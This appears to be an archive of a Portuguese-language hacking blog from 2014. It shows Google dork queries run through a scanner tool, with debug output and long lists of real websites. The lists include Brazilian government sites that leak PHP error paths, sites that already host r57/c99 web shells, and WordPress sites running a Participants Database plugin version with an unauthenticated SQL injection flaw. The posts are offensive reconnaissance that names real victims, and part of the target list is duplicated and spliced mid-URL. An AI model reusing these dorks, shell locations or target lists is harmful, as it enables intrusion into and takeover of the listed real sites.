Procurando notícias sobre erros de tratamentos PDO ou simples consultas SQL/Objetos.


 ----------------------------------------------------------------------------------------------------------------------------
DORK:
inurl:br  intext:"Warning" || intext:"notice" "non-object in /" -"Revista PHP" -inurl:forum.
----------------------------------------------------------------------------------------------------------------------------
DORK encontra erros non-object
0xHOST GOOGLE........: www.google.com.br
0xDORK...............: inurl:br   intext:"Warning" || intext:"notice" "non-object in /" -"Revista PHP" -inurl:forum.
0xEXPLOIT............:
0xARQUIVO............: resultados.txt
0xTIPO DE ERRO.......: 2
0xPROCURAR NO ALVO...: non-object in
0xCOMANDO TERMINAL...: ping -c _ALVO_
0xIP PROXY...........:
0xPORTA..............:

----------------------------------------------------------------------------------------------------------------------------

DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => non-object in
    [cmd] => ping -c _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.&num=1900&btnG=Search
    [port] => 80
)
RESULTADO:

TOTAL DE URL's: 196
EXPLOIT USADO:
DORK: inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.
TOTAL DE POSSÍVEIS VULL: 78
ARQUIVO COM RESULTADO:resultados.txt
LISTA:

http://www.congressomedicopf.com.br/3/5/local
http://webcache.googleusercontent.com/search?q=cache:mHMik8Hn39cJ:http://www.congressomedicopf.com.br/3/5/local%2Binurl:br+++intext:%22Warning%22+%7C%7C+intext:%22notice%22+%22non-object+in+/%22+-%22Revista+PHP%22+-inurl:forum.&num=1900&hl=pt-BR&&ct=clnk
http://www.minhaentrada.com.br/evento/b
http://webcache.googleusercontent.com/search?q=cache:dujAQvNUaScJ:http://www.minhaentrada.com.br/evento/b%2Binurl:br+++intext:%22Warning%22+%7C%7C+intext:%22notice%22+%22non-object+in+/%22+-%22Revista+PHP%22+-inurl:forum.&num=1900&hl=pt-BR&&ct=clnk
http://www.3dcloner.com.br/post/conteudo-2/6/
http://www.gaiaexp.com.br/circuito-gaiaexp-trekking/pousada-sao-joao-da-mata/calendario-de-provas
http://www.phipasa.com.br/videos.php?id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Trying%20to%20get%20property%20of%20non-object%20in%20%3Cb%3E/home/storage/1/e8/f2/phipasa/public_html/modulos/videos/box-videos.php%3C/b%3E%20on%20line%20%3Cb%3E25%3C/b%3E%3Cbr%20/%3E
http://colinas.to.gov.br/conteudo/mi-dengue/263
http://www.shoppingvilla-lobos.com.br/index.php?option=com_loja&view=&Itemid=&codloja=9926944
http://www.shoppingvilla-lobos.com.br/index.php?option=com_loja&view=loja&Itemid=3&codloja=%3Cbr%20/%3E_%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20property:%20stdClass::$COD_PESSOA%20in%20%3Cb%3ED:%5CSites%5Cshoppingvilla-lobos.com.br%5Ctemplates%5Csvl%5Chtml%5Ccom_loja%5Cloja%5Cdefault.php%3C/b%3E%20on%20line%20%3Cb%3E87%3C/b%3E%3Cbr%20/%3E_
http://www.ibiuna.sp.gov.br/cidadao_online/%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Trying%20to%20get%20property%20of%20non-object%20in%20%3Cb%3E/home/storage/c/52/9a/ibiuna2/public_html/view/prefeituraibiuna/cidadao_online/index.php%3C/b%3E%20on%20line%20%3Cb%3E42%3C/b%3E%3Cbr%20/%3Ehttp://www.ibiuna.sp.gov.br/cidadao_online/
http://photosblackbox.com.br/evento/2
http://www.brasilatletismo.com.br/noticias/noticias-1/no-ultimo-salto-duda-garante-vaga-na-final
http://www.afmbs.org.br/site/galeria
http://www-antigo.mpmg.mp.br/portal/public/promotoria/buscarpromotoria?idPromotoria=99
https://novosite.uninorte.com.br/galeria/acao-integrada-de-administracao/img_1696/
http://add.capes.gov.br/index.php/pt-BR/metadado.html?view=metadado
http://www.opticasitamaraty.com.br/lojas/item/458-pantas6
http://moradadaviola.tvabcd.com.br/reprises/
http://www.shoppingtacaruna.com.br/alimentacao/ver/297
http://www.riomarrecife.com.br/index.php?option=com_loja&view=&Itemid=&codloja=3763
http://apianet.com.br/filiais.php
http://www.abramppe.org.br/
http://omelhornacopa.com.br/v2/2014/02/
http://www.onetreinamento.com.br/eventos/eventos/saibamais/id/567
http://www.zapatamexicanbar.com.br/promocao/105800
http://www.santuarioscj.com.br/noticias/noticias-da-paroquia/avisos-paroquiais
http://br.sosveterinariaes.com.br/?cat=8
http://www.andes-vertical.com/adventure.php/%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Trying%20to%20get%20property%20of%20non-object%20in%20%3Cb%3E/home/ju000681/public_html/adventure.php%3C/b%3E%20on%20line%20%3Cb%3E140%3C/b%3E%3Cbr%20/%3E/0
http://www.mercadomineiro.com.br/index.php?m=empresa&id=556&empresa=Meta+Corpus+Pilates
http://www.theresinahall.com.br/videos/pr-poderoso-castiga--coletanea-2
http://www.houseekitchen.com.br/categoria/natal
http://www.inf.ufes.br/~rmanola/blog
http://www.fapesp.br/oportunidades/2000
http://liderinteriores.com.br/modulados/produto/office-linea
http://www.agmfr.com.br/index.php?option=com_events&task=view_detail&agid=9&year=2011&month=02&day=23&Itemid=52
http://www.grupoelogica.com.br/site/?go=clientes
http://www.criativa.com.br/trabalhos/
http://www.direitovirtual.com.br/diario-oficial/diario-tjpi-06082013-C10539.html
http://www.ceudecapella.com.br/einx/redirecionar-pagamento/2
http://caminhosviagens.com.br/viagem/caminhos-de-maria-C156774.html
http://www.jorlan.com.br/veiculo-novo.php?cid=Goiania
http://www.fundacaosemear.org.br/opinioes/detalhes/codigo/1
http://www.feiradocircuitodasmalhas.com.br/2014/camp-ex/
http://www.inpactopropaganda.com.br/novo/index.php/no-forno/97-campanha-70-anos-escritorio-sao-paulo
http://www.blogcentenario.unifei.edu.br/?page_id=2778
http://www.plaxmetal.com.br/componentes/0
http://www.motoryama.com.br/noticia/noticias_motoryama/7
http://www.onecursos.com.br/eventos/eventos/saibamais/id/692
http://www.datacom.ind.br/new/?q=pt-br/solucoes
https://www.pucci.eng.br/php_errors.log
http://www.ancoraengenharia.com.br/areas-de-atuacao/industriais
http://www.sepluga.com.br/
http://www.scvilaolimpia.com.br/index.php?option=com_loja&view=loja&Itemid=4&codloja=1938707
http://www.lwartimpermeabilizantes.com.br/destaques/destaque/chave/visita-tecnica---aplicadores
http://www.impressoramaster.com.br/loja/balcoes-retirada/campo-largo-rg-grafica-rapida-41-3469-2029
http://www.revistamissoes.org.br/artigos/ler/id/2601
http://www.bairroprado.com.br/detalhes-do-imovel/PR2530V/A0097
http://www.helbor.com.br/detalhes-da-noticia/imprensa/77
http://www.rzartmakeup.com.br/wordpress/portfolio_category/gloss/
http://www.jogosabertos2013.com.br/modalidade/bocha-pcd
http://www.spfilmagem.com.br/view.php?v=OVBRPT0=aae48a48d6e795eF8c90b0523dcaee7Y1ZOHYxTlIocFxpdA==MWE4ZGQxjk4NQ==M&i=WlBRPT0=2e0d3ae5c96fb6bw779a7910be8907cWVZYjA8ak5oLWVcMQ==MWE4ZGQxjk4NQ==M
http://www.fani.com.br/v2/index.php?page=produtos&cid=17
http://3pproducoes.com.br/servicos/
http://www.manoleeducacao.com.br/nutricaoclinica/programacao/aplicabilidade-da-bioimpedancia-eletrica-na-pratica-clinica
http://www.ciplak.com.br/destaques/destaque/chave/treinamento-rio-grande-do-norte
http://200.199.211.77/index.php/br/multimidia/imagens.html?folder=Aeroporto+de+Bras%C3%ADlia
http://quintadogolfe.com.br/clube/historia/
http://www.bolor.com.br/fotos
http://geif.com.br/categoria/conferencia-estadual-espirita-do-parana/
http://www.rccsc.com.br/interatividade/agenda/metanoia-2014-06-20
http://www.ipb.org.br/tv/tv4-19125044997583967
http://cefort.ufam.edu.br/portal/index.php?option=com_content&task=view&id=26&Itemid=48
http://www.assisimoveisjatai.com.br/imovel/single/3
http://nucleope.com.br/lancamentos/?id=52
http://viacatarina.com.br/lojas/detalhe/74
http://acervofundiario.incra.gov.br/i3geo/testamapfile.php?map=dnpm
http://rberaldo.com.br/as-mensagens-de-erros-mais-comuns-do-php/
[email protected]:/home/cleiton/pentest/Scanurl#

quarta-feira, 11 de junho de 2014

Pegando aquele shell marota com dork


PEI PEI PEI ACESSEI SUA 0xHACKINAGEM s2
R57 PEI PEI PEI ACESSEI SUA 0xHACKINAGEM s2

0xDORK[0]: intext:"r57shell" || intext:"c99 shell" & intext:"safe_mode:"  &  -github -google -assembla -forum ext:php  *2014

0xDEBUG SCANNER INURL:
DEBUG SCANNER INURL:
0xBaixar:http://pastebin.com/TzijC99y
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => intext%3A%22r57shell%22+%7C%7C+intext%3A%22c99+shell%22+%26+intext%3A%22safe_mode%3A%22++%26++-github+-google+-assembla+-forum+ext%3Aphp++%2A2014
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => safe_mode:
    [cmd] => ping -c 1 _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=intext%3A%22r57shell%22+%7C%7C+intext%3A%22c99+shell%22+%26+intext%3A%22safe_mode%3A%22++%26++-github+-google+-assembla+-forum+ext%3Aphp++%2A2014&num=1900&btnG=Search
    [port] => 80
)

0x[ALGUNS ACHADOS]
http://revistatucan.com/wp-content/themes/premiumnews/cache/external_b85021247782c61723a5a698c61eff52.php
http://www.chelovek-prazdnik.com/block/gallery/big/1553.php?delete
http://www.rodolatina.com.br/pt/noticias_detalhe.php?idProduto=133
http://www.minmini.com/admin/admin1.php?tmp
http://saxen-paris.com/css/_boot.php/sitemap%20
http://webcache.googleusercontent.com/search?q=cache:Fk9ziSWrgA4J:http://saxen-paris.com/css/_boot.php/sitemap%2520
http://srsoverseas.com.np/index.php?page=about_nepal
http://toy.az/index.php?news=2266
http://webcache.googleusercontent.com/search?q=cache:lYdPGLDr3KIJ:http://toy.az/index.php?news%3D2266
http://maheswaribrothers.com/r2.php?delete

http://jacobthomson.com/phpBB2/index.php
http://saxen-paris.com/css/_boot.php
http://www.minmini.com/admin/admin1.php?tmp
http://revistatucan.com/wp-content/themes/premiumnews/cache/external_b85021247782c61723a5a698c61eff52.php
http://www.chelovek-prazdnik.com/block/gallery/big/1553.php?delete
http://www.m-funtime.com/vb/faq.php?service
http://www.campaniameteo.it/immagini/immagini_articoli/r57.php

terça-feira, 10 de junho de 2014

Exploit Participants Database <= 1.5.4.8 Wordpress

0xParticipants Database
Wordpress Participants Database 1.5.4.8 - SQL Injection

É um plugin Wordpress populares que oferece a funcionalidade necessária para construir e manter um banco de dados de pessoas.

É um plugin Wordpress populares que oferece a funcionalidade necessária para construir e manter um banco de dados de pessoas. 
Participants Database Wordpress Participants Database 1.5.4.8 - SQL Injection

- Detalhes sobre a Vulnerabilidade 

1.Devido ao privilégio insuficiente verifica que é possível para anonymous(unauthenticated) para desencadear algumas ações administrativas, se algum dos códigos de acesso é utilizado (por exemplo, inscrição de página).

2. A ação "export CSV" tem um parâmetro chamado "query" que pode conter uma consulta SQL arbitrária. 
Isso significa que um usuário não autenticado pode executar instruções SQL arbitrários (por exemplo, criar um usuário administrador, ler ou escrever arquivos ou executar código dependendo dos privilégios de usuário do MySQL).  

----------------------------------------------------------------------------------------------------------------------------------
0xEXPLOIT:
http://www.exploit-db.com/exploits/33613/


0xDORK[0]:"Index of" "/wp-content/uploads/participants-database"
0xDORK[1]:inurl:"pdb-signup/" "PDB signup"
0xDORK[2]:inurl:"pdb-signup/" intitle:"PDB signup "
----------------------------------------------------------------------------------------------------------------------------------
DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => %22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => Index of /wp-content/uploads/participants-database
    [cmd] => ping -c 1 _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=%22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22&num=1900&btnG=Search
    [port] => 80
)






RESULTADO PARCIAL:


http://webcache.googleusercontent.com/search?q=cache:kUL3synKmD0J:http://ebookily.org/xls/gassendi%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:WuVzKwF26PUJ:http://ebookily.org/xls/kathak-dress%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

 http://webcache.googleusercontent.com/search?q=cache:OZ9vR__pkOgJ:http://www.tag.ubc.ca/iswnetwork.ca/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:MS8BxtAMxoAJ:http://www.shreeyashmatrimonial.com/kiran/d/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:l8rmzvOyZOkJ:http://www.younguttarakhand.org/wp/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:t43d046zpLQJ:http://partycrewgh.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:3kQuvZzwr6EJ:http://top3crew.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:gpBnRGnjbxcJ:http://sdara.com/sdarawebsite/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nHBeHM57ojEJ:http://qsaudi.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:8yfwjuM8apgJ:http://www.blc-denver2.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

http://webcache.googleusercontent.com/search?q=cache:1uEWo4ctyKYJ:http://www.csa.us/www/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:G64f413f7V4J:http://www.gcm73.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:vSoBRrZja70J:http://www.powercollaborative.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:VyTtsWKYn2gJ:http://cccc-houston.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:BAh_697eT80J:http://www.mjbandofgold.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:Luc-zFtM2nEJ:http://www.gapfootball.org.au/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:R6DbMAITjosJ:http://www.4k-nn.ru/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:1ZHqjROYqJ8J:http://www.bcscpa.com/bcs-blog/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:-4lNmZAQJTYJ:http://graceland4kids.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

http://webcache.googleusercontent.com/search?q=cache:seg55mSkGSoJ:http://emeraldtigers.com.au/new_2013_website/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nR8gLIEbCOEJ:http://artisanwineclub.com/index/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:cn3Yz66lQ-AJ:http://www.dsnyfamily.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:7W_fZ-33EVQJ:http://promovgroup.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:KT4lO7pNnswJ:http://www.rebbepiper.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

 http://webcache.googleusercontent.com/search?q=cache:oujptjZTnnMJ:http://www.firt2013barcelona.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.saror
http://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.saroregon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/egon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/